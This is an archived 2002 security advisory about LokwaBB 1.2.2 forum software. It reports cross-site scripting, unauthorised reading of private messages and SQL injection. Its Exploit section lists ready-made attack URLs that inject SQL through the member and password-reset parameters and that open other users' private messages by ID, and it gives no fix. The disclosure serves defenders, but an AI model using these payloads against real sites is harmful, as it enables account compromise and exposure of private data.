TUCoPS :: Web BBS :: etc :: web5451.htm

LokwaBB XSS, privates messages reading and SQL Injection
14th Jun 2002 [SBWID-5451]
COMMAND

	LokwaBB XSS, privates messages reading and SQL Injection

SYSTEMS AFFECTED

	LokwaBB 1.2.2

PROBLEM

	frog-m@n [leseulfrog@hotmail.com] found XSS, privates  messages  reading
	and SQL Injection in LokwaBB [http://lokwa.farcom.com/]
	

	 Exploit

	 =======

	

	

	- http://[target]/member.php?action=viewpro&member=\'%20OR%20password=\'PASSWORD

	- http://[target]/member.php?action=viewpro&member=\'%20OR%20status=\'Administrator

	- misc.php?action=forgot&send=yes&loser=\'%20OR%20password=\'PASSWORD

	- http://[target]/pm.php?action=reply&pmid=[MESSAGE ID]

	

	

	More details in french :
	

	http://www.ifrance.com/kitetoua/tuto/LokwaBB.txt

	

	

	

	Translated by Google :
	

	http://translate.google.com/translate?u=http%3A%2F%2Fwww.ifrance.com%2Fkitetoua%2Ftuto%2FLokwaBB.txt&langpair=fr%7Cen&hl=fr&prev=%2Flanguage_tools

	

	

	

SOLUTION

	Nothing yet.

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH